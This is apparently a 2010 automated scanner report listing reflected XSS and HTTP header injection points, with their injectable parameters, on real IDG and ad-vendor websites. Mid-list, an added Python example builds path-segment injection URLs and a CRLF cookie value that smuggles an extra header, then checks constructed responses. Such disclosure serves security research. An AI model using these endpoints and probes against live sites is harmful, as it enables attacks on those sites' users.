Proof of Concept Exploits for IDG Web Properties with Vendors

CWE-79 and CWE-113 Reports for IDG and Related Party Web Properties | Hoyt LLC Research

Report generated by XSS.CX at Thu Dec 16 09:40:33 CST 2010.

1. HTTP header injection

1.1. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

1.2. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]

1.3. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 2]

1.4. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 3]

1.5. http://www.accelacomm.com/jaw/00019830002630CION8PY4MR9KO__ciost_ppw/10/51087634/ [REST URL parameter 4]

1.6. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 2]

1.7. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 3]

1.8. http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/ [REST URL parameter 4]

1.9. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 2]

1.10. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 3]

1.11. http://www.accelacomm.com/jaw/btob_smm_728/1/51217035/ [REST URL parameter 4]

1.12. http://www.accelacomm.com/jef/51217035/ [REST URL parameter 2]
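The entries in this section, and the "REST URL parameter N" entries in section 2 below, name an insertion point and a vulnerability class but not how the point was located or what a positive result looks like. The Python below is an added example, not code from the XSS.CX report, Hoyt LLC, or any scanner the report was produced with. It derives the numbered path-segment insertion points from a URL exactly as the list counts them, builds the cookie probe used for a CWE-113 (CRLF header injection) test, and checks a raw response for an injected header and for an unencoded CWE-79 reflection. The canary string, the `X-Canary` header name, and every response body and header block are constructed for the example; nothing is sent to the hosts in the list.

```python
# Added example for this report index; not code from XSS.CX, Hoyt LLC or any
# scanner named on the page. It shows (1) how a "REST URL parameter N" insertion
# point is derived from a URL, (2) how a CWE-113 cookie probe is formed, and
# (3) how a raw response is checked for header injection and for unencoded
# reflection. CANARY, the X-Canary header and every response below are
# constructed for the example; nothing is sent over the network.
from urllib.parse import quote, urlsplit, urlunsplit

CANARY = "xsscx"  # assumption: an arbitrary marker that does not occur naturally
INJECTED_HEADER = "X-Canary: injected"  # assumption: the line the CRLF probe tries to add


def rest_url_parameters(url):
    """The path segments a scanner numbers 'REST URL parameter 1..N' (1-based).

    The empty segment produced by a trailing slash is not counted.
    """
    return [seg for seg in urlsplit(url).path.split("/")[1:] if seg != ""]


def inject_rest_parameter(url, index, payload):
    """Return `url` with REST URL parameter `index` replaced by the URL-encoded payload."""
    parts = urlsplit(url)
    segs = parts.path.split("/")  # segs[0] == '' because the path starts with '/'
    numbered = [i for i, seg in enumerate(segs) if i > 0 and seg != ""]
    segs[numbered[index - 1]] = quote(payload, safe="")
    return urlunsplit(parts._replace(path="/".join(segs)))


def cookie_probe(cookie_name, canary=CANARY):
    """Cookie header value for a CWE-113 probe.

    %0d%0a stays encoded on the wire (a request header cannot carry a raw CRLF);
    a server that URL-decodes the cookie and copies it into Set-Cookie without
    stripping CR/LF will terminate that header and emit the injected line.
    """
    return f"{cookie_name}={canary}%0d%0a{INJECTED_HEADER.replace(' ', '%20')}"


def header_injected(raw_headers, injected=INJECTED_HEADER):
    """CWE-113 check: does the injected line appear as a header of its own?"""
    want_name, _, want_value = injected.partition(":")
    for line in raw_headers.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == want_name.strip().lower() and value.strip() == want_value.strip():
            return True
    return False


def classify_reflection(body, canary=CANARY):
    """CWE-79 triage for a probe of the form <canary>.

    'raw'      : angle brackets survived, so markup/script can be injected
    'encoded'  : reflected as &lt;canary&gt;, neutralised in this context
    'stripped' : only the bare canary came back
    'absent'   : not reflected at all
    """
    if f"<{canary}>" in body:
        return "raw"
    if f"&lt;{canary}&gt;" in body:
        return "encoded"
    if canary in body:
        return "stripped"
    return "absent"


# Constructed sample responses (not captured from any host named in the report).
VULNERABLE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    f"Set-Cookie: eyeblaster={CANARY}\r\n"
    f"{INJECTED_HEADER}\r\n"  # the server decoded %0d%0a and emitted our line
    "\r\n"
)
SAFE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    f"Set-Cookie: eyeblaster={CANARY}%0d%0aX-Canary:%20injected\r\n"  # still one header
    "\r\n"
)
VULNERABLE_BODY = f"<html><body>No creative for <{CANARY}></body></html>"
SAFE_BODY = f"<html><body>No creative for &lt;{CANARY}&gt;</body></html>"


if __name__ == "__main__":
    url = "http://www.accelacomm.com/jaw/btob_smm_160/1/51217035/"
    print(rest_url_parameters(url))                      # ['jaw', 'btob_smm_160', '1', '51217035']
    print(inject_rest_parameter(url, 2, f"<{CANARY}>"))  # .../jaw/%3Cxsscx%3E/1/51217035/
    print(cookie_probe("eyeblaster"))                    # eyeblaster=xsscx%0d%0aX-Canary:%20injected
    print(header_injected(VULNERABLE_HEADERS), header_injected(SAFE_HEADERS))   # True False
    print(classify_reflection(VULNERABLE_BODY), classify_reflection(SAFE_BODY))  # raw encoded
```

Two caveats when reading the list with this in hand. A "raw" reflection is the actionable case only when the response is served as text/html; the same reflection into a script or JSON body (the .js and /syndication/json/ entries in section 2) depends on the Content-Type and on how the consumer embeds it, and an "encoded" result is correctly handled input, not a finding. Path segments are probed one at a time because a server that echoes an unrecognised segment into an error or not-found page turns every segment into a sink, which is why a single URL can produce one entry per REST URL parameter.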

2. Cross-site scripting (reflected)

2.1. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 3]

2.2. http://adam-service.app.aol.com/adam-services/api/media/getVideo [REST URL parameter 4]

2.3. http://adam-service.app.aol.com/adam-services/api/media/getVideo [brightcoveId parameter]

2.4. http://adam-service.app.aol.com/adam-services/api/media/getVideo [version parameter]

2.5. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

2.6. http://adserver.adtech.de/ [adiframe|2.0|277|75593|1|246|target parameter]

2.7. http://adserver.adtech.de/ [name of an arbitrarily supplied request parameter]

2.8. http://adserver.adtech.de/addyn%7C2.0%7C277%7C75593%7C1%7C246%7Ctarget=_blank [name of an arbitrarily supplied request parameter]

2.9. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.10. http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.11. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.12. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.13. http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank [name of an arbitrarily supplied request parameter]

2.14. http://adserver.adtech.de/addyn|3.0|277|1028361|0|171|ADTECH [target parameter]

2.15. http://adserver.adtech.de/addyn|3.0|277|1028844|0|889|ADTECH [target parameter]

2.16. http://adserver.adtech.de/addyn|3.0|277|1028878|0|154|ADTECH [target parameter]

2.17. http://adserver.adtech.de/addyn|3.0|277|2144686|0|2130|ADTECH [target parameter]

2.18. http://adserver.adtech.de/addyn|3.0|277|2144687|0|2130|ADTECH [target parameter]

2.19. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [REST URL parameter 1]

2.20. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [name of an arbitrarily supplied request parameter]

2.21. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

2.22. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]

2.23. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [REST URL parameter 1]

2.24. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [name of an arbitrarily supplied request parameter]

2.25. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.26. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]

2.27. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [REST URL parameter 1]

2.28. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]

2.29. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.30. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [target parameter]

2.31. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [REST URL parameter 1]

2.32. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

2.33. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.34. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]

2.35. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [REST URL parameter 1]

2.36. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [name of an arbitrarily supplied request parameter]

2.37. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.38. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]

2.39. http://api.typepad.com/blogs/6a00d83451c82369e200d8341d0a2453ef/post-assets/@published/@recent.js [name of an arbitrarily supplied request parameter]

2.40. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

2.41. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

2.42. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

2.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

2.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

2.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

2.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

2.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

2.48. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 14]

2.49. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 4]

2.50. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 14]

2.51. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 4]

2.52. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 14]

2.53. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 4]

2.54. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

2.55. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

2.56. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

2.57. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

2.58. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

2.59. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

2.60. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

2.61. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

2.62. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

2.63. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

2.64. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

2.65. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

2.66. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

2.67. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

2.68. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

2.69. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

2.70. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

2.71. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

2.72. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]

2.73. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]

2.74. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]

2.75. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]

2.76. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]

2.77. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]

2.78. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 7]

2.79. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 8]

2.80. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 9]

2.81. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 10]

2.82. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 11]

2.83. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 12]

2.84. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 4]

2.85. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 5]

2.86. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 6]

2.87. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 7]

2.88. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 8]

2.89. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/__c__,wbx_ns_image,http:/img.widgetbox.com/uploaded/186b71f5d1659488c4eaa54d4408db05/ibm_backupe.png,wbx_ns_link,http:/ad.doubleclick.net/clk [REST URL parameter 9]

2.90. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 1]

2.91. https://cxo.omeda.com/cgi-win/cio.cgi [REST URL parameter 2]

2.92. https://cxo.omeda.com/cgi-win/cio.cgi [name of an arbitrarily supplied request parameter]

2.93. http://digg.com/submit [REST URL parameter 1]

2.94. http://digg.com/submit/ [REST URL parameter 1]

2.95. https://h30406.www3.hp.com/campaigns/2010/promo/1-8KF4V/landing.php [name of an arbitrarily supplied request parameter]

2.96. http://hs.maas360.com/white-paper/ [REST URL parameter 1]

2.97. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]

2.98. http://idg.com/ [name of an arbitrarily supplied request parameter]

2.99. http://idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]

2.100. http://idg.com/idgnetrssfeeds.nsf/html [name of an arbitrarily supplied request parameter]

2.101. http://idg.com/idgnetrssfeeds.nsf/html [openpage parameter]

2.102. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 1]

2.103. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 3]

2.104. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 4]

2.105. http://idg.com/www/HomeNew.nsf/docs/Brands [name of an arbitrarily supplied request parameter]

2.106. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 1]

2.107. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 3]

2.108. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 4]

2.109. http://idg.com/www/HomeNew.nsf/docs/FAQ [name of an arbitrarily supplied request parameter]

2.110. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 1]

2.111. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 3]

2.112. http://idg.com/www/HomeNew.nsf/docs/IDG_News [REST URL parameter 4]

2.113. http://idg.com/www/HomeNew.nsf/docs/IDG_News [name of an arbitrarily supplied request parameter]

2.114. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 1]

2.115. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 3]

2.116. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [REST URL parameter 4]

2.117. http://idg.com/www/HomeNew.nsf/docs/News_Service_Intro [name of an arbitrarily supplied request parameter]

2.118. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 1]

2.119. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 3]

2.120. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [REST URL parameter 4]

2.121. http://idg.com/www/HomeNew.nsf/docs/Tech_Update [name of an arbitrarily supplied request parameter]

2.122. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

2.123. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

2.124. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

2.125. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

2.126. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

2.127. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

2.128. http://idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

2.129. http://idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

2.130. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 1]

2.131. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 3]

2.132. http://idg.com/www/HomeNew.nsf/docs/company_milestones [REST URL parameter 4]

2.133. http://idg.com/www/HomeNew.nsf/docs/company_milestones [name of an arbitrarily supplied request parameter]

2.134. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 1]

2.135. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 3]

2.136. http://idg.com/www/HomeNew.nsf/docs/contact_us [REST URL parameter 4]

2.137. http://idg.com/www/HomeNew.nsf/docs/contact_us [name of an arbitrarily supplied request parameter]

2.138. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 1]

2.139. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 3]

2.140. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [REST URL parameter 4]

2.141. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [name of an arbitrarily supplied request parameter]

2.142. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 1]

2.143. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 3]

2.144. http://idg.com/www/HomeNew.nsf/docs/idc [REST URL parameter 4]

2.145. http://idg.com/www/HomeNew.nsf/docs/idc [name of an arbitrarily supplied request parameter]

2.146. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 1]

2.147. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 3]

2.148. http://idg.com/www/HomeNew.nsf/docs/idg_executives [REST URL parameter 4]

2.149. http://idg.com/www/HomeNew.nsf/docs/idg_executives [name of an arbitrarily supplied request parameter]

2.150. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 1]

2.151. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 3]

